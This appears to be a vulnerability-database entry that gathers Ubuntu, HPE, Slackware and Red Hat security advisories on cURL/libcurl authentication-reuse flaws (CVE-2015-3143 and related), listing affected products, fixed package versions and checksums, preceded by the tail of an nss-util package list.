6.5):\n\nSource:\nnss-util-3.16.1-4.el6_5.src.rpm\n\nx86_64:\nnss-util-3.16.1-4.el6_5.i686.rpm\nnss-util-3.16.1-4.el6_5.x86_64.rpm\nnss-util-debuginfo-3.16.1-4.el6_5.i686.rpm\nnss-util-debuginfo-3.16.1-4.el6_5.x86_64.rpm\nnss-util-devel-3.16.1-4.el6_5.i686.rpm\nnss-util-devel-3.16.1-4.el6_5.x86_64.rpm\n\nRed Hat Enterprise Linux Server EUS (v. 6.6):\n\nSource:\nnss-util-3.19.1-3.el6_6.src.rpm\n\ni386:\nnss-util-3.19.1-3.el6_6.i686.rpm\nnss-util-debuginfo-3.19.1-3.el6_6.i686.rpm\nnss-util-devel-3.19.1-3.el6_6.i686.rpm\n\nppc64:\nnss-util-3.19.1-3.el6_6.ppc.rpm\nnss-util-3.19.1-3.el6_6.ppc64.rpm\nnss-util-debuginfo-3.19.1-3.el6_6.ppc.rpm\nnss-util-debuginfo-3.19.1-3.el6_6.ppc64.rpm\nnss-util-devel-3.19.1-3.el6_6.ppc.rpm\nnss-util-devel-3.19.1-3.el6_6.ppc64.rpm\n\ns390x:\nnss-util-3.19.1-3.el6_6.s390.rpm\nnss-util-3.19.1-3.el6_6.s390x.rpm\nnss-util-debuginfo-3.19.1-3.el6_6.s390.rpm\nnss-util-debuginfo-3.19.1-3.el6_6.s390x.rpm\nnss-util-devel-3.19.1-3.el6_6.s390.rpm\nnss-util-devel-3.19.1-3.el6_6.s390x.rpm\n\nx86_64:\nnss-util-3.19.1-3.el6_6.i686.rpm\nnss-util-3.19.1-3.el6_6.x86_64.rpm\nnss-util-debuginfo-3.19.1-3.el6_6.i686.rpm\nnss-util-debuginfo-3.19.1-3.el6_6.x86_64.rpm\nnss-util-devel-3.19.1-3.el6_6.i686.rpm\nnss-util-devel-3.19.1-3.el6_6.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode EUS (v. 7.1):\n\nSource:\nnss-util-3.19.1-5.el7_1.src.rpm\n\nx86_64:\nnss-util-3.19.1-5.el7_1.i686.rpm\nnss-util-3.19.1-5.el7_1.x86_64.rpm\nnss-util-debuginfo-3.19.1-5.el7_1.i686.rpm\nnss-util-debuginfo-3.19.1-5.el7_1.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode Optional EUS (v. 7.1):\n\nx86_64:\nnss-util-debuginfo-3.19.1-5.el7_1.i686.rpm\nnss-util-debuginfo-3.19.1-5.el7_1.x86_64.rpm\nnss-util-devel-3.19.1-5.el7_1.i686.rpm\nnss-util-devel-3.19.1-5.el7_1.x86_64.rpm\n\nRed Hat Enterprise Linux Server EUS (v. 7.1):\n\nSource:\nnss-util-3.19.1-5.el7_1.src.rpm\n\nppc64:\nnss-util-3.19.1-5.el7_1.ppc.rpm\nnss-util-3.19.1-5.el7_1.ppc64.rpm\nnss-util-debuginfo-3.19.1-5.el7_1.ppc.rpm\nnss-util-debuginfo-3.19.1-5.el7_1.ppc64.rpm\nnss-util-devel-3.19.1-5.el7_1.ppc.rpm\nnss-util-devel-3.19.1-5.el7_1.ppc64.rpm\n\ns390x:\nnss-util-3.19.1-5.el7_1.s390.rpm\nnss-util-3.19.1-5.el7_1.s390x.rpm\nnss-util-debuginfo-3.19.1-5.el7_1.s390.rpm\nnss-util-debuginfo-3.19.1-5.el7_1.s390x.rpm\nnss-util-devel-3.19.1-5.el7_1.s390.rpm\nnss-util-devel-3.19.1-5.el7_1.s390x.rpm\n\nx86_64:\nnss-util-3.19.1-5.el7_1.i686.rpm\nnss-util-3.19.1-5.el7_1.x86_64.rpm\nnss-util-debuginfo-3.19.1-5.el7_1.i686.rpm\nnss-util-debuginfo-3.19.1-5.el7_1.x86_64.rpm\nnss-util-devel-3.19.1-5.el7_1.i686.rpm\nnss-util-devel-3.19.1-5.el7_1.x86_64.rpm\n\nRed Hat Enterprise Linux Server EUS (v. 7.1):\n\nSource:\nnss-util-3.19.1-5.ael7b_1.src.rpm\n\nppc64le:\nnss-util-3.19.1-5.ael7b_1.ppc64le.rpm\nnss-util-debuginfo-3.19.1-5.ael7b_1.ppc64le.rpm\nnss-util-devel-3.19.1-5.ael7b_1.ppc64le.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2016 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niD8DBQFW8mrxXlSAg2UNWIIRApd+AKC89tmaT/sw/qZV56m0D+wS0ksruwCgoZdA\nLWDm7Ow/XWG3HaU1ic1EWh4=\n=RGkL\n-----END PGP SIGNATURE-----\n\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n",
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VAR-201504-0147
Vulnerability from variot - Updated: 2026-04-10 23:26cURL and libcurl 7.10.6 through 7.41.0 does not properly re-use NTLM connections, which allows remote attackers to connect as other users via an unauthenticated request, a similar issue to CVE-2014-0015. cURL/libcURL is prone to a remote security-bypass vulnerability. An attacker can leverage this issue to bypass security restrictions and perform unauthorized actions. This may aid in further attacks. cURL/libcURL 7.10.6 through versions 7.41.0 are vulnerable. Both Haxx curl and libcurl are products of the Swedish company Haxx. curl is a set of file transfer tools that use URL syntax to work on the command line. libcurl is a free, open source client-side URL transfer library. ============================================================================ Ubuntu Security Notice USN-2591-1 April 30, 2015
curl vulnerabilities
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 15.04
- Ubuntu 14.10
- Ubuntu 14.04 LTS
- Ubuntu 12.04 LTS
Summary:
Several security issues were fixed in curl.
Software Description: - curl: HTTP, HTTPS, and FTP client and client libraries
Details:
Paras Sethia discovered that curl could incorrectly re-use NTLM HTTP credentials when subsequently connecting to the same host over HTTP. (CVE-2015-3143)
Hanno B=C3=B6ck discovered that curl incorrectly handled zero-length host names. If a user or automated system were tricked into using a specially crafted host name, an attacker could possibly use this issue to cause curl to crash, resulting in a denial of service, or possibly execute arbitrary code. This issue only affected Ubuntu 14.10 and Ubuntu 15.04. If a user or automated system were tricked into parsing a specially crafted cookie, an attacker could possibly use this issue to cause curl to crash, resulting in a denial of service, or possibly execute arbitrary code. This issue only affected Ubuntu 14.04 LTS, Ubuntu 14.10 and Ubuntu 15.04. (CVE-2015-3145)
Isaac Boukris discovered that when using Negotiate authenticated connections, curl could incorrectly authenticate the entire connection and not just specific HTTP requests. (CVE-2015-3148)
Yehezkel Horowitz and Oren Souroujon discovered that curl sent HTTP headers both to servers and proxies by default, contrary to expectations. This issue only affected Ubuntu 14.10 and Ubuntu 15.04. (CVE-2015-3153)
Update instructions:
The problem can be corrected by updating your system to the following package versions:
Ubuntu 15.04: libcurl3 7.38.0-3ubuntu2.2 libcurl3-gnutls 7.38.0-3ubuntu2.2 libcurl3-nss 7.38.0-3ubuntu2.2
Ubuntu 14.10: libcurl3 7.37.1-1ubuntu3.4 libcurl3-gnutls 7.37.1-1ubuntu3.4 libcurl3-nss 7.37.1-1ubuntu3.4
Ubuntu 14.04 LTS: libcurl3 7.35.0-1ubuntu2.5 libcurl3-gnutls 7.35.0-1ubuntu2.5 libcurl3-nss 7.35.0-1ubuntu2.5
Ubuntu 12.04 LTS: libcurl3 7.22.0-3ubuntu4.14 libcurl3-gnutls 7.22.0-3ubuntu4.14 libcurl3-nss 7.22.0-3ubuntu4.14
In general, a standard system update will make all the necessary changes. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
Note: the current version of the following document is available here: https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_n a-c04986859
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c04986859 Version: 1
HPSBHF03544 rev.1 - HPE iMC PLAT and other HP and H3C products using Comware 7 and cURL, Remote Unauthorized Access
NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.
Release Date: 2016-02-19 Last Updated: 2016-02-19
Potential Security Impact: Remote Unauthorized Access
Source: Hewlett Packard Enterprise, Product Security Response Team
VULNERABILITY SUMMARY Potential security vulnerabilities in cURL and libcurl have been addressed with HPE iMC PLAT and other HP and H3C products using Comware 7. The vulnerabilities could be exploited remotely resulting in unauthorized access.
References:
- CVE-2015-3143
- CVE-2015-3148
- SSRT102110
- PSRT110028
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. Please refer to the RESOLUTION below for a list of impacted products.
Note: all product versions are impacted prior to the fixed versions listed.
BACKGROUND
CVSS 2.0 Base Metrics
Reference Base Vector Base Score CVE-2015-3143 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0 CVE-2015-3148 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0 =========================================================== Information on CVSS is documented in HP Customer Notice: HPSN-2008-002
RESOLUTION HPE has released the following software updates to resolve the vulnerabilities in Comware 7 and iMC Plat.
COMWARE 7 Products
- 12500 (Comware 7) R7375
- HP Network Products
- JC085A HP A12518 Switch Chassis
- JC086A HP A12508 Switch Chassis
- JC652A HP 12508 DC Switch Chassis
- JC653A HP 12518 DC Switch Chassis
- JC654A HP 12504 AC Switch Chassis
- JC655A HP 12504 DC Switch Chassis
- JF430A HP A12518 Switch Chassis
- JF430B HP 12518 Switch Chassis
- JF430C HP 12518 AC Switch Chassis
- JF431A HP A12508 Switch Chassis
- JF431B HP 12508 Switch Chassis
- JF431C HP 12508 AC Switch Chassis
- JC072B HP 12500 Main Processing Unit
- JG497A HP 12500 MPU w/Comware V7 OS
- JG782A HP FF 12508E AC Switch Chassis
- JG783A HP FF 12508E DC Switch Chassis
- JG784A HP FF 12518E AC Switch Chassis
- JG785A HP FF 12518E DC Switch Chassis
- JG802A HP FF 12500E MPU
- JG836A HP FlexFabric 12518E AC Switch TAA-compliant Chassis
- JG834A HP FlexFabric 12508E AC Switch TAA-compliant Chassis
- JG835A HP FlexFabric 12508E DC Switch TAA-compliant Chassis
- JG837A HP FlexFabric 12518E DC Switch TAA-compliant Chassis
- JG803A HP FlexFabric 12500E TAA-compliant Main Processing Unit
- JG796A HP FlexFabric 12500 48-port 10GbE SFP+ FD Module
- JG790A HP FlexFabric 12500 16-port 40GbE QSFP+ FD Module
- JG794A HP FlexFabric 12500 40-port 10GbE SFP+ FG Module
- JG792A HP FlexFabric 12500 40-port 10GbE SFP+ FD Module
- JG788A HP FlexFabric 12500 4-port 100GbE CFP FG Module
- JG786A HP FlexFabric 12500 4-port 100GbE CFP FD Module
- JG797A HP FlexFabric 12500 48-port 10GbE SFP+ FD TAA-compliant Module
- JG791A HP FlexFabric 12500 16-port 40GbE QSFP+ FD TAA-compliant Module
- JG795A HP FlexFabric 12500 40-port 10GbE SFP+ FG TAA-compliant Module
- JG793A HP FlexFabric 12500 40-port 10GbE SFP+ FD TAA-compliant Module
- JG789A HP FlexFabric 12500 4-port 100GbE CFP FG TAA-compliant Module
- JG787A HP FlexFabric 12500 4-port 100GbE CFP FD TAA-compliant Module
- JG798A HP FlexFabric 12508E Fabric Module
- H3C Products
- H3C S12508 Routing Switch (AC-1) (0235A0GE)
- H3C S12518 Routing Switch (AC-1) (0235A0GF)
- H3C S12508 Chassis (0235A0E6)
- H3C S12508 Chassis (0235A38N)
- H3C S12518 Chassis (0235A0E7)
- H3C S12518 Chassis (0235A38M)
- H3C 12508 DC Switch Chassis (0235A38L)
- H3C 12518 DC Switch Chassis (0235A38K)
- 10500 (Comware 7) R7168
- HP Network Products
- JC611A HP 10508-V Switch Chassis
- JC612A HP 10508 Switch Chassis
- JC613A HP 10504 Switch Chassis
- JC748A HP 10512 Switch Chassis
- JG820A HP 10504 TAA Switch Chassis
- JG821A HP 10508 TAA Switch Chassis
- JG822A HP 10508-V TAA Switch Chassis
- JG823A HP 10512 TAA Switch Chassis
- JG496A HP 10500 Type A MPU w/Comware v7 OS
- JH198A HP 10500 Type D Main Processing Unit with Comware v7 Operating System
- JH191A HP 10500 44-port GbE(SFP,LC)/ 4-port 10GbE SFP+ (SFP+,LC) SE Module
- JH192A HP 10500 48-port Gig-T (RJ45) SE Module
- JH193A HP 10500 16-port 10GbE SFP+ (SFP+,LC) SF Module
- JH194A HP 10500 24-port 10GbE SFP+ (SFP+,LC) EC Module
- JH195A HP 10500 6-port 40GbE QSFP+ EC Module
- JH196A HP 10500 2-port 100GbE CFP EC Module
- JH197A HP 10500 48-port 10GbE SFP+ (SFP+,LC) SG Module
- 12900 (Comware 7) R1137
- HP Network Products
- JG619A HP FlexFabric 12910 Switch AC Chassis
- JG621A HP FlexFabric 12910 Main Processing Unit
- JG632A HP FlexFabric 12916 Switch AC Chassis
- JG634A HP FlexFabric 12916 Main Processing Unit
- JH104A HP FlexFabric 12900E Main Processing Unit
- JH114A HP FlexFabric 12910 TAA-compliant Main Processing Unit
- JH263A HP FlexFabric 12904E Main Processing Unit
- JH255A HP FlexFabric 12908E Switch Chassis
- JH262A HP FlexFabric 12904E Switch Chassis
- JH113A HP FlexFabric 12910 TAA-compliant Switch AC Chassis
- JH103A HP FlexFabric 12916E Switch Chassis
- 5900 (Comware 7) R2422P01
- HP Network Products
- JC772A HP 5900AF-48XG-4QSFP+ Switch
- JG336A HP 5900AF-48XGT-4QSFP+ Switch
- JG510A HP 5900AF-48G-4XG-2QSFP+ Switch
- JG554A HP 5900AF-48XG-4QSFP+ TAA Switch
- JG838A HP FF 5900CP-48XG-4QSFP+ Switch
- JH036A HP FlexFabric 5900CP 48XG 4QSFP+ TAA-Compliant
- JH037A HP 5900AF 48XGT 4QSFP+ TAA-Compliant Switch
- JH038A HP 5900AF 48G 4XG 2QSFP+ TAA-Compliant
- 5920 (Comware 7) R2422P01
- HP Network Products
- JG296A HP 5920AF-24XG Switch
- JG555A HP 5920AF-24XG TAA Switch
- MSR1000 (Comware 7) R0304P04
- HP Network Products
- JG875A HP MSR1002-4 AC Router
- JH060A HP MSR1003-8S AC Router
- MSR2000 (Comware 7) R0304P04
- HP Network Products
- JG411A HP MSR2003 AC Router
- JG734A HP MSR2004-24 AC Router
- JG735A HP MSR2004-48 Router
- JG866A HP MSR2003 TAA-compliant AC Router
- MSR3000 (Comware 7) R0304P04
- HP Network Products
- JG404A HP MSR3064 Router
- JG405A HP MSR3044 Router
- JG406A HP MSR3024 AC Router
- JG407A HP MSR3024 DC Router
- JG408A HP MSR3024 PoE Router
- JG409A HP MSR3012 AC Router
- JG410A HP MSR3012 DC Router
- JG861A HP MSR3024 TAA-compliant AC Router
- MSR4000 (Comware 7) R0304P04
- HP Network Products
- JG402A HP MSR4080 Router Chassis
- JG403A HP MSR4060 Router Chassis
- JG412A HP MSR4000 MPU-100 Main Processing Unit
- JG869A HP MSR4000 TAA-compliant MPU-100 Main Processing Unit
- VSR (Comware 7) E0321
- HP Network Products
- JG810AAE HP VSR1001 Virtual Services Router 60 Day Evaluation Software
- JG811AAE HP VSR1001 Comware 7 Virtual Services Router
- JG812AAE HP VSR1004 Comware 7 Virtual Services Router
- JG813AAE HP VSR1008 Comware 7 Virtual Services Router
- 7900 (Comware 7) R2137
- HP Network Products
- JG682A HP FlexFabric 7904 Switch Chassis
- JG841A HP FlexFabric 7910 Switch Chassis
- JG842A HP FlexFabric 7910 7.2Tbps Fabric / Main Processing Unit
- JH001A HP FlexFabric 7910 2.4Tbps Fabric / Main Processing Unit
- JH122A HP FlexFabric 7904 TAA-compliant Switch Chassis
- JH123A HP FlexFabric 7910 TAA-compliant Switch Chassis
- JH124A HP FlexFabric 7910 7.2Tbps TAA-compliant Fabric/Main Processing Unit
- JH125A HP FlexFabric 7910 2.4Tbps TAA-compliant Fabric/Main Processing Unit
- 5130 (Comware 7) R3109P09
- HP Network Products
- JG932A HP 5130-24G-4SFP+ EI Switch
- JG933A HP 5130-24G-SFP-4SFP+ EI Switch
- JG934A HP 5130-48G-4SFP+ EI Switch
- JG936A HP 5130-24G-PoE+-4SFP+ (370W) EI Switch
- JG937A HP 5130-48G-PoE+-4SFP+ (370W) EI Switch
- JG975A HP 5130-24G-4SFP+ EI Brazil Switch
- JG976A HP 5130-48G-4SFP+ EI Brazil Switch
- JG977A HP 5130-24G-PoE+-4SFP+ (370W) EI Brazil Switch
- JG978A HP 5130-48G-PoE+-4SFP+ (370W) EI Brazil Switch
- JG938A HP 5130-24G-2SFP+-2XGT EI Switch
- JG939A HP 5130-48G-2SFP+-2XGT EI Switch
- JG940A HP 5130-24G-PoE+-2SFP+-2XGT (370W) EI Switch
- JG941A HP 5130-48G-PoE+-2SFP+-2XGT (370W) EI Switch
- 5700 (Comware 7) R2422P01
- HP Network Products
- JG894A HP FlexFabric 5700-48G-4XG-2QSFP+ Switch
- JG895A HP FlexFabric 5700-48G-4XG-2QSFP+ TAA-compliant Switch
- JG896A HP FlexFabric 5700-40XG-2QSFP+ Switch
- JG897A HP FlexFabric 5700-40XG-2QSFP+ TAA-compliant Switch
- JG898A HP FlexFabric 5700-32XGT-8XG-2QSFP+ Switch
- JG899A HP FlexFabric 5700-32XGT-8XG-2QSFP+ TAA-compliant Switch
- 5930 (Comware 7) R2422P01
- HP Network Products
- JG726A HP FlexFabric 5930 32QSFP+ Switch
- JG727A HP FlexFabric 5930 32QSFP+ TAA-compliant Switch
- JH178A HP FlexFabric 5930 2QSFP+ 2-slot Switch
- JH179A HP FlexFabric 5930 4-slot Switch
- JH187A HP FlexFabric 5930 2QSFP+ 2-slot TAA-compliant Switch
- JH188A HP FlexFabric 5930 4-slot TAA-compliant Switch
- HSR6602 (Comware 7) R7103P05
- HP Network Products
- JG353A HP HSR6602-G Router
- JG354A HP HSR6602-XG Router
- JG776A HP HSR6602-G TAA-compliant Router
- JG777A HP HSR6602-XG TAA-compliant Router
- HSR6800 (Comware 7) R7103P05
- HP Network Products
- JG361A HP HSR6802 Router Chassis
- JG361B HP HSR6802 Router Chassis
- JG362A HP HSR6804 Router Chassis
- JG362B HP HSR6804 Router Chassis
- JG363A HP HSR6808 Router Chassis
- JG363B HP HSR6808 Router Chassis
- JG364A HP HSR6800 RSE-X2 Router Main Processing Unit
- JG779A HP HSR6800 RSE-X2 Router TAA-compliant Main Processing Unit
- JH075A) HP HSR6800 RSE-X3 Router Main Processing Unit
- 1950 R3109P09
- HP Network Products
- JG960A HP 1950-24G-4XG Switch
- JG961A HP 1950-48G-2SFP+-2XGT Switch
- JG962A HP 1950-24G-2SFP+-2XGT-PoE+(370W) Switch
- JG963A HP 1950-48G-2SFP+-2XGT-PoE+(370W) Switch
iMC
- iMC Plat iMC Plat 7.1 (E0303P13)
- HP Network Products
- JD125A HP IMC Std S/W Platform w/100-node
- JD126A HP IMC Ent S/W Platform w/100-node
- JD808A HP IMC Ent Platform w/100-node License
- JD814A HP A-IMC Enterprise Edition Software DVD Media
- JD815A HP IMC Std Platform w/100-node License
- JD816A HP A-IMC Standard Edition Software DVD Media
- JF288AAE HP Network Director to Intelligent Management Center Upgrade E-LTU
- JF289AAE HP Enterprise Management System to Intelligent Management Center Upgrade E-LTU
- JF377A HP IMC Std S/W Platform w/100-node Lic
- JF377AAE HP IMC Std S/W Pltfrm w/100-node E-LTU
- JF378A HP IMC Ent S/W Platform w/200-node Lic
- JF378AAE HP IMC Ent S/W Pltfrm w/200-node E-LTU
- JG546AAE HP IMC Basic SW Platform w/50-node E-LTU
- JG548AAE HP PCM+ to IMC Bsc Upgr w/50-node E-LTU
- JG549AAE HP PCM+ to IMC Std Upgr w/200-node E-LTU
- JG550AAE HP PMM to IMC Bsc WLM Upgr w/150AP E-LTU
- JG590AAE HP IMC Bsc WLAN Mgr SW Pltfm 50 AP E-LTU
- JG659AAE HP IMC Smart Connect VAE E-LTU
- JG660AAE HP IMC Smart Connect w/WLM VAE E-LTU
- JG747AAE HP IMC Std SW Plat w/ 50 Nodes E-LTU
- JG748AAE HP IMC Ent SW Plat w/ 50 Nodes E-LTU
- JG766AAE HP IMC SmCnct Vrtl Applnc SW E-LTU
- JG767AAE HP IMC SmCnct WSM Vrtl Applnc SW E-LTU
- JG768AAE HP PCM+ to IMC Std Upg w/ 200-node E-LTU
HISTORY Version:1 (rev.1) - 19 February 2016 Initial release
Third Party Security Patches: Third party security patches that are to be installed on systems running Hewlett Packard Enterprise (HPE) software products should be applied in accordance with the customer's patch management policy.
Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HPE Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hpe.com.
Report: To report a potential security vulnerability with any HPE supported product, send Email to: security-alert@hpe.com
Subscribe: To initiate a subscription to receive future HPE Security Bulletin alerts via Email: http://www.hpe.com/support/Subscriber_Choice
Security Bulletin Archive: A list of recently released Security Bulletins is available here: http://www.hpe.com/support/Security_Bulletin_Archive
Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB.
3C = 3COM 3P = 3rd Party Software GN = HPE General Software HF = HPE Hardware and Firmware MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PV = ProCurve ST = Storage Software UX = HP-UX
Copyright 2016 Hewlett Packard Enterprise
Hewlett Packard Enterprise shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett Packard Enterprise and the names of Hewlett Packard Enterprise products referenced herein are trademarks of Hewlett Packard Enterprise in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners. 7) - x86_64
-
(BZ#1154060)
-
TLS 1.1 and TLS 1.2 are no longer disabled by default in libcurl. (BZ#1170339)
-
FTP operations such as downloading files took a significantly long time to complete. Now, the FTP implementation in libcurl correctly sets blocking direction and estimated timeout for connections, resulting in faster FTP transfers. (BZ#1066065)
-
The libcurl library did not implement a non-blocking SSL handshake, which negatively affected performance of applications based on the libcurl multi API. The non-blocking SSL handshake has been implemented in libcurl, and the libcurl multi API now immediately returns the control back to the application whenever it cannot read or write data from or to the underlying network socket. (BZ#1091429)
-
The libcurl library used an unnecessarily long blocking delay for actions with no active file descriptors, even for short operations. Some actions, such as resolving a host name using /etc/hosts, took a long time to complete. The blocking code in libcurl has been modified so that the initial delay is short and gradually increases until an event occurs.
Here are the details from the Slackware 14.1 ChangeLog: +--------------------------+ patches/packages/curl-7.45.0-i486-1_slack14.1.txz: Upgraded. For more information, see: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3143 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3144 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3145 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3148 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3236 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3237 ( Security fix ) +--------------------------+
Where to find the new packages: +-----------------------------+
Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-)
Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you.
Updated package for Slackware 13.0: ftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/curl-7.45.0-i486-1_slack13.0.txz
Updated package for Slackware x86_64 13.0: ftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/curl-7.45.0-x86_64-1_slack13.0.txz
Updated package for Slackware 13.1: ftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/curl-7.45.0-i486-1_slack13.1.txz
Updated package for Slackware x86_64 13.1: ftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/curl-7.45.0-x86_64-1_slack13.1.txz
Updated package for Slackware 13.37: ftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/curl-7.45.0-i486-1_slack13.37.txz
Updated package for Slackware x86_64 13.37: ftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/curl-7.45.0-x86_64-1_slack13.37.txz
Updated package for Slackware 14.0: ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/curl-7.45.0-i486-1_slack14.0.txz
Updated package for Slackware x86_64 14.0: ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/curl-7.45.0-x86_64-1_slack14.0.txz
Updated package for Slackware 14.1: ftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/curl-7.45.0-i486-1_slack14.1.txz
Updated package for Slackware x86_64 14.1: ftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/curl-7.45.0-x86_64-1_slack14.1.txz
Updated package for Slackware -current: ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/curl-7.45.0-i586-1.txz
Updated package for Slackware x86_64 -current: ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/curl-7.45.0-x86_64-1.txz
MD5 signatures: +-------------+
Slackware 13.0 package: e9307566f43c3c12ac72f12cea688741 curl-7.45.0-i486-1_slack13.0.txz
Slackware x86_64 13.0 package: 5fe5a7733ce969f8f468c6b03cf6b1f7 curl-7.45.0-x86_64-1_slack13.0.txz
Slackware 13.1 package: 9d3d5ccbae7284c84c4667885bf9fd0d curl-7.45.0-i486-1_slack13.1.txz
Slackware x86_64 13.1 package: 7e7f04d3de8d34b8b082729ceaa53ba9 curl-7.45.0-x86_64-1_slack13.1.txz
Slackware 13.37 package: 00bd418a8607ea74d1986c08d5358052 curl-7.45.0-i486-1_slack13.37.txz
Slackware x86_64 13.37 package: 23e7da7ab6846fed5d18b5f5399ac400 curl-7.45.0-x86_64-1_slack13.37.txz
Slackware 14.0 package: 76f010b92c755f16f19840723d845e21 curl-7.45.0-i486-1_slack14.0.txz
Slackware x86_64 14.0 package: daf0b67147a50e44d89f8852632fcdf7 curl-7.45.0-x86_64-1_slack14.0.txz
Slackware 14.1 package: 8c2a5796d4a4ce840a767423667eb97b curl-7.45.0-i486-1_slack14.1.txz
Slackware x86_64 14.1 package: 763157115101b63867217707ff4a9021 curl-7.45.0-x86_64-1_slack14.1.txz
Slackware -current package: 0c2d192aff4af6f74281a1d724d31ce3 n/curl-7.45.0-i586-1.txz
Slackware x86_64 -current package: 4791e2bb2afd43ec0642d94e22259e81 n/curl-7.45.0-x86_64-1.txz
Installation instructions: +------------------------+
Upgrade the package as root:
upgradepkg curl-7.45.0-i486-1_slack14.1.txz
+-----+
Slackware Linux Security Team http://slackware.com/gpg-key security@slackware.com
+------------------------------------------------------------------------+ | To leave the slackware-security mailing list: | +------------------------------------------------------------------------+ | Send an email to majordomo@slackware.com with this text in the body of | | the email message: | | | | unsubscribe slackware-security | | | | You will get a confirmation message back containing instructions to | | complete the process. Please do not reply to this email address. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
===================================================================== Red Hat Security Advisory
Synopsis: Moderate: curl security, bug fix, and enhancement update Advisory ID: RHSA-2015:1254-02 Product: Red Hat Enterprise Linux Advisory URL: https://rhn.redhat.com/errata/RHSA-2015-1254.html Issue date: 2015-07-22 Updated on: 2014-12-15 CVE Names: CVE-2014-3613 CVE-2014-3707 CVE-2014-8150 CVE-2015-3143 CVE-2015-3148 =====================================================================
- Summary:
Updated curl packages that fix multiple security issues, several bugs, and add two enhancements are now available for Red Hat Enterprise Linux 6.
Red Hat Product Security has rated this update as having Moderate security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.
- Relevant releases/architectures:
Red Hat Enterprise Linux Desktop (v. 6) - i386, x86_64 Red Hat Enterprise Linux Desktop Optional (v. 6) - i386, x86_64 Red Hat Enterprise Linux HPC Node (v. 6) - x86_64 Red Hat Enterprise Linux HPC Node Optional (v. 6) - x86_64 Red Hat Enterprise Linux Server (v. 6) - i386, ppc64, s390x, x86_64 Red Hat Enterprise Linux Workstation (v. 6) - i386, x86_64
- Description:
The curl packages provide the libcurl library and the curl utility for downloading files from servers using various protocols, including HTTP, FTP, and LDAP.
It was found that the libcurl library did not correctly handle partial literal IP addresses when parsing received HTTP cookies. An attacker able to trick a user into connecting to a malicious server could use this flaw to set the user's cookie to a crafted domain, making other cookie-related issues easier to exploit. (CVE-2014-3613)
A flaw was found in the way the libcurl library performed the duplication of connection handles. If an application set the CURLOPT_COPYPOSTFIELDS option for a handle, using the handle's duplicate could cause the application to crash or disclose a portion of its memory. (CVE-2014-3707)
It was discovered that the libcurl library failed to properly handle URLs with embedded end-of-line characters. An attacker able to make an application using libcurl to access a specially crafted URL via an HTTP proxy could use this flaw to inject additional headers to the request or construct additional requests. (CVE-2014-8150)
It was discovered that libcurl implemented aspects of the NTLM and Negotatiate authentication incorrectly. If an application uses libcurl and the affected mechanisms in a specifc way, certain requests to a previously NTLM-authenticated server could appears as sent by the wrong authenticated user. Additionally, the initial set of credentials for HTTP Negotiate-authenticated requests could be reused in subsequent requests, although a different set of credentials was specified. (CVE-2015-3143, CVE-2015-3148)
Red Hat would like to thank the cURL project for reporting these issues.
Bug fixes:
-
An out-of-protocol fallback to SSL version 3.0 (SSLv3.0) was available with libcurl. Attackers could abuse the fallback to force downgrade of the SSL version. The fallback has been removed from libcurl. Users requiring this functionality can explicitly enable SSLv3.0 through the libcurl API. (BZ#1154059)
-
A single upload transfer through the FILE protocol opened the destination file twice. If the inotify kernel subsystem monitored the file, two events were produced unnecessarily. The file is now opened only once per upload. (BZ#883002)
-
Utilities using libcurl for SCP/SFTP transfers could terminate unexpectedly when the system was running in FIPS mode. (BZ#1008178)
-
